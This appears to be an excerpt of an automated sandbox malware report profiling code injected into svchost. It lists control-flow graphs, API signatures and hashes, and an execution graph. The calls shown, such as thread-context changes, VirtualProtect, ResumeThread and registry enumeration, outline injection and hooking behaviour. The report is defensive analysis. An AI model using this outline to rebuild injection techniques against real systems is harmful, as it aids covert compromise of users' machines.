                                                control_flow_graph 581 26a879c5c10-26a879c5c37 582 26a879c5c39-26a879c5c48 581->582 583 26a879c5c4b-26a879c5c56 GetCurrentThreadId 581->583 582->583 584 26a879c5c58-26a879c5c5d 583->584 585 26a879c5c62-26a879c5c69 583->585 586 26a879c608f-26a879c60a6 call 26a879c7a20 584->586 587 26a879c5c7b-26a879c5c8f 585->587 588 26a879c5c6b-26a879c5c76 call 26a879c5a40 585->588 591 26a879c5c9e-26a879c5ca4 587->591 588->586 594 26a879c5d75-26a879c5d96 591->594 595 26a879c5caa-26a879c5cb3 591->595 600 26a879c5eff-26a879c5f10 call 26a879c759f 594->600 601 26a879c5d9c-26a879c5dbc GetThreadContext 594->601 597 26a879c5cb5-26a879c5cf8 call 26a879c86a0 595->597 598 26a879c5cfa-26a879c5d6d call 26a879c45f0 call 26a879c4590 call 26a879c4550 595->598 611 26a879c5d70 597->611 598->611 615 26a879c5f15-26a879c5f1b 600->615 604 26a879c5dc2-26a879c5de3 601->604 605 26a879c5efa 601->605 604->605 614 26a879c5de9-26a879c5df2 604->614 605->600 611->591 619 26a879c5e72-26a879c5e83 614->619 620 26a879c5df4-26a879c5e05 614->620 616 26a879c5fde-26a879c5fee 615->616 617 26a879c5f21-26a879c5f78 VirtualProtect FlushInstructionCache 615->617 626 26a879c5ffe-26a879c600a call 26a879c4ed0 616->626 627 26a879c5ff0-26a879c5ff7 616->627 621 26a879c5fa9-26a879c5fd9 call 26a879c798c 617->621 622 26a879c5f7a-26a879c5f84 617->622 623 26a879c5ef5 619->623 624 26a879c5e85-26a879c5ea3 619->624 628 26a879c5e07-26a879c5e1c 620->628 629 26a879c5e6d 620->629 621->615 622->621 630 26a879c5f86-26a879c5fa1 call 26a879c4470 622->630 624->623 631 26a879c5ea5-26a879c5ef0 call 26a879c39e0 call 26a879c75bd 624->631 645 26a879c600f-26a879c6015 626->645 627->626 633 26a879c5ff9 call 26a879c44c0 627->633 628->629 635 26a879c5e1e-26a879c5e68 call 26a879c3a50 SetThreadContext 628->635 629->623 630->621 631->623 633->626 635->629 646 26a879c6057-26a879c6075 645->646 647 26a879c6017-26a879c6055 ResumeThread call 26a879c798c 645->647 650 26a879c6077-26a879c6086 646->650 651 26a879c6089 646->651 647->645 650->651 651->586
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000001B.00000002.2930009936.0000026A879C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026A879C0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_27_2_26a879c0000_svchost.jbxd
                                                Similarity
                                                • API ID: Thread$Current$Context
                                                • String ID:
                                                • API String ID: 1666949209-0
                                                • Opcode ID: 52f3b0a83a9fc5b22f41d8404852d8b34c9dcd72dd37eace61d9b8d2680426a2
                                                • Instruction ID: 668ed7f2667091ced11d858c5786cb119bf8f80e5a5e4a6a64a44aaa3e9ecd61
                                                • Opcode Fuzzy Hash: 52f3b0a83a9fc5b22f41d8404852d8b34c9dcd72dd37eace61d9b8d2680426a2
                                                • Instruction Fuzzy Hash: 50D18C76208B8881EAB0DB1AE49435E7BB4F3D8B84F154216EA8D57BA5DF39C541CF01
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000001B.00000002.2930009936.0000026A879C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026A879C0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_27_2_26a879c0000_svchost.jbxd
                                                Similarity
                                                • API ID: Heap$Process$AllocFree
                                                • String ID: dialer
                                                • API String ID: 756756679-3528709123
                                                • Opcode ID: 5b923b6f3d4b051af17e4e8faeca1d1198f97f66eaed8709a0f00f88d373bc4e
                                                • Instruction ID: 4e4df6a00d47054bd9678bac00e72608e7238581d895763a19b039f4903db13a
                                                • Opcode Fuzzy Hash: 5b923b6f3d4b051af17e4e8faeca1d1198f97f66eaed8709a0f00f88d373bc4e
                                                • Instruction Fuzzy Hash: DA31A231701B519AFF95DF16A84826D7BA0FB84B94F0881209F8C27B55EF3AC4A1CB02
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000001B.00000002.2930009936.0000026A879C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026A879C0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_27_2_26a879c0000_svchost.jbxd
                                                Similarity
                                                • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                                • String ID:
                                                • API String ID: 517849248-0
                                                • Opcode ID: bec16919e3b07d6ab1f360bf5186f0ec190c680636fdb39b4f696954ffc34d04
                                                • Instruction ID: fa2f4e6e1173dce71ba7fbc21c8ec9abc64c048dfb6ec85f973e965938c3ec86
                                                • Opcode Fuzzy Hash: bec16919e3b07d6ab1f360bf5186f0ec190c680636fdb39b4f696954ffc34d04
                                                • Instruction Fuzzy Hash: B4016971300A4196FB90DB12A85C35D7BA1F788FC1F888035CE8D53B54DE3EC9898B41
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000001B.00000002.2930009936.0000026A879C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026A879C0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_27_2_26a879c0000_svchost.jbxd
                                                Similarity
                                                • API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
                                                • String ID:
                                                • API String ID: 449555515-0
                                                • Opcode ID: e4252fc9f6451678ca3b672aa508af9be8436cc55dc462e8819adcbe9d266895
                                                • Instruction ID: 88e1dc055e24f007908cfd903687df20f7c2d2507063046347e7f2aeeb900160
                                                • Opcode Fuzzy Hash: e4252fc9f6451678ca3b672aa508af9be8436cc55dc462e8819adcbe9d266895
                                                • Instruction Fuzzy Hash: A5111775611B41C2FBA4DB65E81D75E7EB0BB88B82F040429CA4D27764EF3EC4088B02
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000001B.00000002.2930009936.0000026A879C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026A879C0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_27_2_26a879c0000_svchost.jbxd
                                                Similarity
                                                • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                • String ID: csm$f
                                                • API String ID: 2395640692-629598281
                                                • Opcode ID: a12096fde07cdb9e3353675e9d74aeeedb8b2868f95cbc04e37ad4e594267797
                                                • Instruction ID: 6ab0d891425302b41ef9979ff86cf2d6f11ac9e1349dcf3938e42dc16432e1c0
                                                • Opcode Fuzzy Hash: a12096fde07cdb9e3353675e9d74aeeedb8b2868f95cbc04e37ad4e594267797
                                                • Instruction Fuzzy Hash: 8A51BD32311640CAEF94CF25E44CB5D3BA5F3A4BA8F528120DE4A67788EB37D941CB02
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000001B.00000002.2930009936.0000026A879C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026A879C0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_27_2_26a879c0000_svchost.jbxd
                                                Similarity
                                                • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                • String ID: csm$f
                                                • API String ID: 2395640692-629598281
                                                • Opcode ID: 9d9690251bde7e8cf310a92dbdf710b9b231990aa6f8d8297185bd8ead255550
                                                • Instruction ID: cb143f3d6994fee4eb32646ee3a4132a5777a16b8d7ef106b84b70684e1f550f
                                                • Opcode Fuzzy Hash: 9d9690251bde7e8cf310a92dbdf710b9b231990aa6f8d8297185bd8ead255550
                                                • Instruction Fuzzy Hash: 1531C032210680DAEB94DF11E84C71D3BA5F794BA8F058114AE4A27785DB3AD941CB06
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000001B.00000002.2930009936.0000026A879C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026A879C0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_27_2_26a879c0000_svchost.jbxd
                                                Similarity
                                                • API ID: FinalHandleNamePathlstrlen
                                                • String ID: \\?\
                                                • API String ID: 2719912262-4282027825
                                                • Opcode ID: 16112503ebd4bbaf0721a34979430d9d9890d46ad4397212c59debcfc05cbbbd
                                                • Instruction ID: 8ba78bf88c1916c61f564416cb90b9acd9514bc905b3ba5d15dab470fb65a13c
                                                • Opcode Fuzzy Hash: 16112503ebd4bbaf0721a34979430d9d9890d46ad4397212c59debcfc05cbbbd
                                                • Instruction Fuzzy Hash: 5BF03C7230464196FBA0CB21F99835D7F61F784B99F848020CA4D57959EE6EC688CF01
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000001B.00000002.2930009936.0000026A879C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026A879C0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_27_2_26a879c0000_svchost.jbxd
                                                Similarity
                                                • API ID: CombinePath
                                                • String ID: \\.\pipe\
                                                • API String ID: 3422762182-91387939
                                                • Opcode ID: a10b9fbf5d2c898f7c9b708695815e9cf74f4df3f8d5b839e299d2cca4937a3b
                                                • Instruction ID: adf10e1541d886bfc46832840359db2901279f5cca05dbc69dded0e73e1861d5
                                                • Opcode Fuzzy Hash: a10b9fbf5d2c898f7c9b708695815e9cf74f4df3f8d5b839e299d2cca4937a3b
                                                • Instruction Fuzzy Hash: 7FF08230704B80D2FE80CB13B90811DBE21EB88FD1F088131DE5E27B28DE2DC4418B02
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000001B.00000002.2930009936.0000026A879C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026A879C0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_27_2_26a879c0000_svchost.jbxd
                                                Similarity
                                                • API ID: AddressFreeHandleLibraryModuleProc
                                                • String ID: CorExitProcess$mscoree.dll
                                                • API String ID: 4061214504-1276376045
                                                • Opcode ID: 9217264d43014ce808c99de8a8145fbe135b698a21aa29953e209d5462850717
                                                • Instruction ID: 0ba0d654cb6f18296789ccbe063357a8a2b3fcf1d8cae2d0dced513f39d16d73
                                                • Opcode Fuzzy Hash: 9217264d43014ce808c99de8a8145fbe135b698a21aa29953e209d5462850717
                                                • Instruction Fuzzy Hash: A6F0FE7132164492FFD4CF60E89836D3F60EB88B91F442019994FA7574DE29C488CF12
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000001B.00000002.2930009936.0000026A879C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026A879C0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_27_2_26a879c0000_svchost.jbxd
                                                Similarity
                                                • API ID: CurrentThread
                                                • String ID:
                                                • API String ID: 2882836952-0
                                                • Opcode ID: 065eb2a24c7300192409b1f4bca8757e198c759726111ad2bde78b52490ea3d6
                                                • Instruction ID: b5e59098baef328b6d7bdbe74c7cb822dd7390226da7e9ac6dd182fe16b175d4
                                                • Opcode Fuzzy Hash: 065eb2a24c7300192409b1f4bca8757e198c759726111ad2bde78b52490ea3d6
                                                • Instruction Fuzzy Hash: D402BA36219B80C6EBA0CB55E49435EBBA0F3D4794F205116EA8E97BA9DF7DC484CF01
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000001B.00000002.2930009936.0000026A879C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026A879C0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_27_2_26a879c0000_svchost.jbxd
                                                Similarity
                                                • API ID: ConsoleErrorLastMode_invalid_parameter_noinfo
                                                • String ID:
                                                • API String ID: 2210144848-0
                                                • Opcode ID: 4bcbd420be841bafcf1cb86917f82a61becb6801fc8ef256a9047459a88e7092
                                                • Instruction ID: 46f073674741d853182dd06e49b026107be083b4c17cd02207308e0e43a20ad0
                                                • Opcode Fuzzy Hash: 4bcbd420be841bafcf1cb86917f82a61becb6801fc8ef256a9047459a88e7092
                                                • Instruction Fuzzy Hash: EB81C032B1065089FBD0DB69D94C3AD3FA1F784B98F444156DE1A77792DB36C441CB22
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000001B.00000002.2930009936.0000026A879C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026A879C0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_27_2_26a879c0000_svchost.jbxd
                                                Similarity
                                                • API ID: CurrentThread
                                                • String ID:
                                                • API String ID: 2882836952-0
                                                • Opcode ID: 94d32eef5ebe536b0a0adfa3e0b32a568b4410008b4bb6dfd84b7e083660618c
                                                • Instruction ID: d90cda66bbfad1debd14c78d4e1d40b92ccf3fbe301fd6ccc73bba502c12dda2
                                                • Opcode Fuzzy Hash: 94d32eef5ebe536b0a0adfa3e0b32a568b4410008b4bb6dfd84b7e083660618c
                                                • Instruction Fuzzy Hash: A561DA36519B40C6EBA0CB15E45831EBBE4F3D8754F605216EA8E67BA8DB7EC540CF01
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000001B.00000002.2929010361.0000026A87990000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026A87990000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_27_2_26a87990000_svchost.jbxd
                                                Similarity
                                                • API ID: _set_statfp
                                                • String ID:
                                                • API String ID: 1156100317-0
                                                • Opcode ID: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
                                                • Instruction ID: 7ef8aaefcf1b905b68fa67122955c18c980f192bf2e6b4bd5c6510424708fb32
                                                • Opcode Fuzzy Hash: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
                                                • Instruction Fuzzy Hash: 19112532EC3E0001FBE41969E55E3ADB0706B54374F090224AB7637BDAFE1ACC424A07
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000001B.00000002.2930009936.0000026A879C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026A879C0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_27_2_26a879c0000_svchost.jbxd
                                                Similarity
                                                • API ID: _set_statfp
                                                • String ID:
                                                • API String ID: 1156100317-0
                                                • Opcode ID: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
                                                • Instruction ID: 325e6dd0d984f579dabc2df724599173956b793cad1da30d5df66ae2e0b34588
                                                • Opcode Fuzzy Hash: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
                                                • Instruction Fuzzy Hash: A211A373A98B0001F6D891ADE45F3AD3C40EB64374F5A0625AB76373E6AB1ACC814906
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000001B.00000002.2930009936.0000026A879C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026A879C0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_27_2_26a879c0000_svchost.jbxd
                                                Similarity
                                                • API ID: CurrentProcessProtectVirtual$HandleModule
                                                • String ID:
                                                • API String ID: 1092925422-0
                                                • Opcode ID: a6312042db82c9c62213c4cc61283d131af5cc2d1631b4a6c699d8a5d8d1a662
                                                • Instruction ID: 9cb059389f430eefe55732830a83e879fcbc2c0922e6bfc06ba8584c724dddf5
                                                • Opcode Fuzzy Hash: a6312042db82c9c62213c4cc61283d131af5cc2d1631b4a6c699d8a5d8d1a662
                                                • Instruction Fuzzy Hash: 5011FA3A705B4182FF949B51F40826D7AB4F788B85F044029DE8D17795EE3EC545CB06
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000001B.00000002.2929010361.0000026A87990000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026A87990000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_27_2_26a87990000_svchost.jbxd
                                                Similarity
                                                • API ID: CurrentImageNonwritable__except_validate_context_record
                                                • String ID: csm$f
                                                • API String ID: 3242871069-629598281
                                                • Opcode ID: a12096fde07cdb9e3353675e9d74aeeedb8b2868f95cbc04e37ad4e594267797
                                                • Instruction ID: 9c9adf42bdbe15e594f47225c290312529cae0cac6b0b1dfddc7f7636dbbf591
                                                • Opcode Fuzzy Hash: a12096fde07cdb9e3353675e9d74aeeedb8b2868f95cbc04e37ad4e594267797
                                                • Instruction Fuzzy Hash: 3F51A332712A009BFB94CF15E488F5D37A5F384B98F528128DA1A6B788DB36D945CF07
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000001B.00000002.2929010361.0000026A87990000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026A87990000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_27_2_26a87990000_svchost.jbxd
                                                Similarity
                                                • API ID: CurrentImageNonwritable__except_validate_context_record
                                                • String ID: csm$f
                                                • API String ID: 3242871069-629598281
                                                • Opcode ID: 9d9690251bde7e8cf310a92dbdf710b9b231990aa6f8d8297185bd8ead255550
                                                • Instruction ID: 59c4ffac785529dcdcadff87240a1ef8f544bfcca855935e61c0aa6ef90fdcab
                                                • Opcode Fuzzy Hash: 9d9690251bde7e8cf310a92dbdf710b9b231990aa6f8d8297185bd8ead255550
                                                • Instruction Fuzzy Hash: 8D31D172211740A6F794DF11E888F1D77A4F780BC8F168018EE4A67788CB3AC944CB07
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000001B.00000002.2930009936.0000026A879C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026A879C0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_27_2_26a879c0000_svchost.jbxd
                                                Similarity
                                                • API ID: Heap$Process$Free
                                                • String ID:
                                                • API String ID: 3168794593-0
                                                • Opcode ID: 5f7cef85691391bfd1f64b5ed8b2db0144129af346a3a3b2b5e725a5d1a6a2a2
                                                • Instruction ID: 503738bbb351b992aa054f619d5032a0360e56ad1c0bab80166c19a25c48d67a
                                                • Opcode Fuzzy Hash: 5f7cef85691391bfd1f64b5ed8b2db0144129af346a3a3b2b5e725a5d1a6a2a2
                                                • Instruction Fuzzy Hash: 2A115832514B89D2FB94DFA6A84821E7F60F789B85F044129EB8E23755EF3AC0518B45
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000001B.00000002.2930009936.0000026A879C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026A879C0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_27_2_26a879c0000_svchost.jbxd
                                                Similarity
                                                • API ID: FileType
                                                • String ID: \\.\pipe\
                                                • API String ID: 3081899298-91387939
                                                • Opcode ID: 6e49d471cca68daba176b61e5ee439cd114eed484b1fe0d421767ac79cd7910d
                                                • Instruction ID: b7904aae615f521d7812c3f5e65d9e24a3ce78fdd2b7a407f501b4ad358c7a2d
                                                • Opcode Fuzzy Hash: 6e49d471cca68daba176b61e5ee439cd114eed484b1fe0d421767ac79cd7910d
                                                • Instruction Fuzzy Hash: 9571D43220478186EFA4DF259A483EEB790F7C5B84F444016DE4E63B99DE36C6848F42
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000001B.00000002.2930009936.0000026A879C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026A879C0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_27_2_26a879c0000_svchost.jbxd
                                                Similarity
                                                • API ID: FileType
                                                • String ID: \\.\pipe\
                                                • API String ID: 3081899298-91387939
                                                • Opcode ID: afcb3e66faa42eb2bcf346096e8e020fbdcda90173b34b97db97a4810a61a98e
                                                • Instruction ID: a6c0abc4f2a2b75ba774e9e6d1f259500821b8a5541e7079b06ca42121c14c5d
                                                • Opcode Fuzzy Hash: afcb3e66faa42eb2bcf346096e8e020fbdcda90173b34b97db97a4810a61a98e
                                                • Instruction Fuzzy Hash: 9551DD32204B8182EEF4DF29965C3AEB751F7C5780F454026DE8A23B99DE3BC4458F52
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000001B.00000002.2930009936.0000026A879C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026A879C0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_27_2_26a879c0000_svchost.jbxd
                                                Similarity
                                                • API ID: ErrorFileLastWrite
                                                • String ID: U
                                                • API String ID: 442123175-4171548499
                                                • Opcode ID: a13edceeabc266f7553562aa63bd5b4e25a5c0a5c0c842b56dee7ecd57ba2728
                                                • Instruction ID: 8ca21fce6d0e22c8cf5732f9377e562903c25c7ef9583250b87a770ae0f6e834
                                                • Opcode Fuzzy Hash: a13edceeabc266f7553562aa63bd5b4e25a5c0a5c0c842b56dee7ecd57ba2728
                                                • Instruction Fuzzy Hash: A341C672715A8081EBA0DF69E8483AE7FA0F798784F844125EE4D97798DB3DC541CF41
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000001B.00000002.2930009936.0000026A879C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026A879C0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_27_2_26a879c0000_svchost.jbxd
                                                Similarity
                                                • API ID: Stringtry_get_function
                                                • String ID: LCMapStringEx
                                                • API String ID: 2588686239-3893581201
                                                • Opcode ID: 8d086b69a67710f16bbac061c243311228bfa9ac644515e4c5b930ef6255b9c6
                                                • Instruction ID: 109b6a62fa6fb2b36cdbe3fe010a87026b8d3f57eb8c45ceefd888f193cb09d2
                                                • Opcode Fuzzy Hash: 8d086b69a67710f16bbac061c243311228bfa9ac644515e4c5b930ef6255b9c6
                                                • Instruction Fuzzy Hash: 1C111A36608B8086DBA0CB56F88429ABBA4F7C9B90F544126EECD93B59DF38C550CB00
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000001B.00000002.2930009936.0000026A879C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026A879C0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_27_2_26a879c0000_svchost.jbxd
                                                Similarity
                                                • API ID: ExceptionFileHeaderRaise
                                                • String ID: csm
                                                • API String ID: 2573137834-1018135373
                                                • Opcode ID: 9d9897ce25571c28e51806bf44cef2494793ace286fcfb8ca6bb858d3561ec5c
                                                • Instruction ID: dcf103bb4589dd5b540d64a674de9561a88b06da2b8737606ccbc7e3f2d77857
                                                • Opcode Fuzzy Hash: 9d9897ce25571c28e51806bf44cef2494793ace286fcfb8ca6bb858d3561ec5c
                                                • Instruction Fuzzy Hash: C1111C32218B80C2EBA18F15E54425DBBA5F798BA8F584225DF8D1BB68DF39C555CB00
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000001B.00000002.2930009936.0000026A879C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026A879C0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_27_2_26a879c0000_svchost.jbxd
                                                Similarity
                                                • API ID: CountCriticalInitializeSectionSpintry_get_function
                                                • String ID: InitializeCriticalSectionEx
                                                • API String ID: 539475747-3084827643
                                                • Opcode ID: 84d4d9e5c8567b0c470c1df2abda769c6c41ef7958af45e9a0e3fb38bbb318e4
                                                • Instruction ID: 03b0360fd42107760eec48b338194edc7a88d918eba2d166d42b9dffb87d2d1d
                                                • Opcode Fuzzy Hash: 84d4d9e5c8567b0c470c1df2abda769c6c41ef7958af45e9a0e3fb38bbb318e4
                                                • Instruction Fuzzy Hash: 88F0E231314B8082FBD4DB41F50829C7F20ABC8B80F884025AE4D23B24CF3AC994CF02
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000001B.00000002.2929010361.0000026A87990000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026A87990000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_27_2_26a87990000_svchost.jbxd
                                                Similarity
                                                • API ID: try_get_function
                                                • String ID: November$October
                                                • API String ID: 2742660187-1636048786
                                                • Opcode ID: fdce6644ec914193c36bb80fdc4676b7f0aefee418b5ba3fb3fb30fec7b157a7
                                                • Instruction ID: 9650eb30da5b7a6529ee697977e8b296c7743997b23b3ce03466238b801360dd
                                                • Opcode Fuzzy Hash: fdce6644ec914193c36bb80fdc4676b7f0aefee418b5ba3fb3fb30fec7b157a7
                                                • Instruction Fuzzy Hash: 54E0927120554192FB84DB69F8483ECB221DBA4740F695022951927362CF3ACC86CB42
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000001B.00000002.2930009936.0000026A879C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026A879C0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_27_2_26a879c0000_svchost.jbxd
                                                Similarity
                                                • API ID: Valuetry_get_function
                                                • String ID: FlsSetValue
                                                • API String ID: 738293619-3750699315
                                                • Opcode ID: 50ddf312d192e0080d8f7be73491643e669436d55e40d94a578a073710abe0d4
                                                • Instruction ID: 35d45f319071ec7e043f06cd9aaf194d67642004657d02158ade06abddba33c1
                                                • Opcode Fuzzy Hash: 50ddf312d192e0080d8f7be73491643e669436d55e40d94a578a073710abe0d4
                                                • Instruction Fuzzy Hash: E2E06D71204A4092FED4CB54F90C69C7E22ABC8780F988022D90D27365CE3AC895CF12
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000001B.00000002.2930009936.0000026A879C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026A879C0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_27_2_26a879c0000_svchost.jbxd
                                                Similarity
                                                • API ID: Heap$Process$AllocFree
                                                • String ID:
                                                • API String ID: 756756679-0
                                                • Opcode ID: 3779bcfafb90e2edd239bdf2c4b5cd58a413f829d06d4561fa4d45091366f8f0
                                                • Instruction ID: b0d2f8c75bfc013734b9faa92ae29b0f6fef55afc5c9f2525d95d49fb7accf6f
                                                • Opcode Fuzzy Hash: 3779bcfafb90e2edd239bdf2c4b5cd58a413f829d06d4561fa4d45091366f8f0
                                                • Instruction Fuzzy Hash: 95218172644B80C2EF91CF69A40825EBBA0FBC8B94F554110EE8CA7B25FF79C5428B05
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000001B.00000002.2930009936.0000026A879C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026A879C0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_27_2_26a879c0000_svchost.jbxd
                                                Similarity
                                                • API ID: Heap$AllocProcess
                                                • String ID:
                                                • API String ID: 1617791916-0
                                                • Opcode ID: 8b038beba27963a8280261039ce2f03ebd498cc74250c16b652da3202c115688
                                                • Instruction ID: 98d8d3de4ce2ba425b96842ab48ec1da97cf51971eb9959754a84dd95e99a7c2
                                                • Opcode Fuzzy Hash: 8b038beba27963a8280261039ce2f03ebd498cc74250c16b652da3202c115688
                                                • Instruction Fuzzy Hash: 89E0C2B1A11A02C6F748DBA6D81835A7EE1EB88B52F49C024C94D07360DF7EC49ACB91

                                                Execution Graph

                                                Execution Coverage:0.8%
                                                Dynamic/Decrypted Code Coverage:0%
                                                Signature Coverage:0%
                                                Total number of Nodes:515
                                                Total number of Limit Nodes:3
                                                execution_graph 14065 179537a1c28 14070 179537a1650 GetProcessHeap HeapAlloc 14065->14070 14067 179537a1c3e Sleep SleepEx 14068 179537a1c37 14067->14068 14068->14067 14069 179537a15c0 StrCmpIW StrCmpW 14068->14069 14069->14068 14114 179537a1274 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 14070->14114 14072 179537a1678 14115 179537a1274 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 14072->14115 14074 179537a1689 14116 179537a1274 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 14074->14116 14076 179537a1692 14117 179537a1274 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 14076->14117 14078 179537a169b 14079 179537a16b6 RegOpenKeyExW 14078->14079 14080 179537a16e8 RegOpenKeyExW 14079->14080 14081 179537a18ce 14079->14081 14082 179537a1711 14080->14082 14083 179537a1727 RegOpenKeyExW 14080->14083 14081->14068 14118 179537a12c8 RegQueryInfoKeyW 14082->14118 14085 179537a1762 RegOpenKeyExW 14083->14085 14086 179537a174b 14083->14086 14089 179537a1786 14085->14089 14090 179537a179d RegOpenKeyExW 14085->14090 14128 179537a104c RegQueryInfoKeyW 14086->14128 14092 179537a12c8 16 API calls 14089->14092 14093 179537a17c1 14090->14093 14094 179537a17d8 RegOpenKeyExW 14090->14094 14097 179537a1793 RegCloseKey 14092->14097 14098 179537a12c8 16 API calls 14093->14098 14095 179537a1813 RegOpenKeyExW 14094->14095 14096 179537a17fc 14094->14096 14100 179537a1837 14095->14100 14101 179537a184e RegOpenKeyExW 14095->14101 14099 179537a12c8 16 API calls 14096->14099 14097->14090 14102 179537a17ce RegCloseKey 14098->14102 14103 179537a1809 RegCloseKey 14099->14103 14104 179537a104c 6 API calls 14100->14104 14105 179537a1872 14101->14105 14106 179537a1889 RegOpenKeyExW 14101->14106 14102->14094 14103->14095 14107 179537a1844 RegCloseKey 14104->14107 14108 179537a104c 6 API calls 14105->14108 14109 179537a18c4 RegCloseKey 14106->14109 14110 179537a18ad 14106->14110 14107->14101 14111 179537a187f RegCloseKey 14108->14111 14109->14081 14112 179537a104c 6 API calls 14110->14112 14111->14106 14113 179537a18ba RegCloseKey 14112->14113 14113->14109 14114->14072 14115->14074 